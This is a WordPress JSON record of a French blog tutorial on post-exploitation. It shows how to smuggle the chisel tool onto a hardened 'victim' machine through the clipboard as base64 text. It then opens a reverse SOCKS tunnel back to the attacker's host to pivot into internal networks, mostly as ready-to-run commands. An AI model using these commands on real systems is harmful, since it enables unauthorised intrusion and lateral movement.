{"id":743,"date":"2021-08-01T20:19:01","date_gmt":"2021-08-02T01:19:01","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=743"},"modified":"2021-08-03T11:48:57","modified_gmt":"2021-08-03T16:48:57","slug":"transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/","title":{"rendered":"Transfert de fichiers avec xclip lorsqu&#8217;aucun logiciel n&#8217;est disponible sur la victime"},"content":{"rendered":"<p>La victime a limit\u00e9 au minimum le nombre de logiciels disponibles pour qu&#8217;il soit particuli\u00e8rement difficile pour un attaquant d&#8217;obtenir le compte de l&#8217;administrateur ou encore d&#8217;exfiltrer de l&#8217;information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une m\u00e9thode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu&#8217;aucun utilitaire n&#8217;est offert. Le principale est simple, vous envoyer le fichier par le terminal , caract\u00e8re par caract\u00e8re! Pas manuellement, mais avec l&#8217;utilitaire xclip. Voici comment proc\u00e9der.<\/p>\n<p>apt install xclip<\/p>\n<p>xclip permet de copier un fichier en utilisant le clipboard du serveur X<\/p>\n<p>pour se faire, vous encodez le fichier au format base64 et le copier dans le clipboard<\/p>\n<p><code>cat chisel | base64 -w500 | xclip -sel o #sur l&#039;ordinateur de l&#039;attaquant (XServer). ceci permettra de copier chisel (ou un autre fichier) sur la vitime pour infiltrer le r\u00e9seau<\/code><\/p>\n<p>Sur la victime<br \/>\n<pre><code>cat &lt;&lt; EOF &gt; chisel.base64\n#ici on utilise les touches SHIFT+INSERT ou le bonton droit de la souris et Paste Selection\n#on attend que le clipboard soit totalement affich\u00e9...\nEOF\n\ncat chisel.base64 | base64 -d &gt; chisel\nchmod +x chisel<\/code><\/pre><\/p>\n<p>Dans le fichier \/etc\/proxychains.conf de l&#8217;attaquant<br \/>\n<pre><code>[ProxyList]\nsocks5&nbsp;&nbsp; 127.0.0.1 1080<\/code><\/pre><\/p>\n<p>Sur l&#8217;attaquant<br \/>\n<code>sudo .\/chisel server -p 8000 --reverse<\/code><\/p>\n<p>Sur la victime<br \/>\n<code>.\/chisel client 10.9.0.24:8000 R:socks<\/code><\/p>\n<p>On peut maintenant acc\u00e9der aux r\u00e9seaux disponibles sur la victime en utilisant notre proxy sur le port 1080<\/p>\n<p>proxychains curl 192.168.3.22:3386 -v<\/p>\n","protected":false},"excerpt":{"rendered":"<p>La victime a limit\u00e9 au minimum le nombre de logiciels disponibles pour qu&#8217;il soit particuli\u00e8rement difficile pour un attaquant d&#8217;obtenir le compte de l&#8217;administrateur ou encore d&#8217;exfiltrer de l&#8217;information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une m\u00e9thode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu&#8217;aucun utilitaire n&#8217;est offert. Le principale est simple, vous envoyer le fichier par le terminal , caract\u00e8re par caract\u00e8re! Pas manuellement, mais avec l&#8217;utilitaire xclip. Voici comment proc\u00e9der. apt install xclip xclip permet de copier un fichier en utilisant <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[27],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Transfert de fichiers avec xclip lorsqu&#039;aucun logiciel n&#039;est disponible sur la victime - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Transfert de fichiers avec xclip lorsqu&#039;aucun logiciel n&#039;est disponible sur la victime - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"La victime a limit\u00e9 au minimum le nombre de logiciels disponibles pour qu&#8217;il soit particuli\u00e8rement difficile pour un attaquant d&#8217;obtenir le compte de l&#8217;administrateur ou encore d&#8217;exfiltrer de l&#8217;information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une m\u00e9thode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu&#8217;aucun utilitaire n&#8217;est offert. Le principale est simple, vous envoyer le fichier par le terminal , caract\u00e8re par caract\u00e8re! Pas manuellement, mais avec l&#8217;utilitaire xclip. Voici comment proc\u00e9der. apt install xclip xclip permet de copier un fichier en utilisant\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-02T01:19:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-03T16:48:57+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/\",\"name\":\"Transfert de fichiers avec xclip lorsqu'aucun logiciel n'est disponible sur la victime - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-08-02T01:19:01+00:00\",\"dateModified\":\"2021-08-03T16:48:57+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Transfert de fichiers avec xclip lorsqu&#8217;aucun logiciel n&#8217;est disponible sur la victime\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Transfert de fichiers avec xclip lorsqu'aucun logiciel n'est disponible sur la victime - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/","og_locale":"fr_CA","og_type":"article","og_title":"Transfert de fichiers avec xclip lorsqu'aucun logiciel n'est disponible sur la victime - S\u00e9curiser votre site","og_description":"La victime a limit\u00e9 au minimum le nombre de logiciels disponibles pour qu&#8217;il soit particuli\u00e8rement difficile pour un attaquant d&#8217;obtenir le compte de l&#8217;administrateur ou encore d&#8217;exfiltrer de l&#8217;information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une m\u00e9thode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu&#8217;aucun utilitaire n&#8217;est offert. Le principale est simple, vous envoyer le fichier par le terminal , caract\u00e8re par caract\u00e8re! Pas manuellement, mais avec l&#8217;utilitaire xclip. Voici comment proc\u00e9der. apt install xclip xclip permet de copier un fichier en utilisant","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-08-02T01:19:01+00:00","article_modified_time":"2021-08-03T16:48:57+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/","name":"Transfert de fichiers avec xclip lorsqu'aucun logiciel n'est disponible sur la victime - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-08-02T01:19:01+00:00","dateModified":"2021-08-03T16:48:57+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/01\/transfert-de-fichiers-avec-xclip-lorsquaucun-logiciel-nest-disponible-sur-la-victime\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Transfert de fichiers avec xclip lorsqu&#8217;aucun logiciel n&#8217;est disponible sur la victime"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/743"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=743"}],"version-history":[{"count":3,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/743\/revisions"}],"predecessor-version":[{"id":746,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/743\/revisions\/746"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=743"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=743"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=743"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}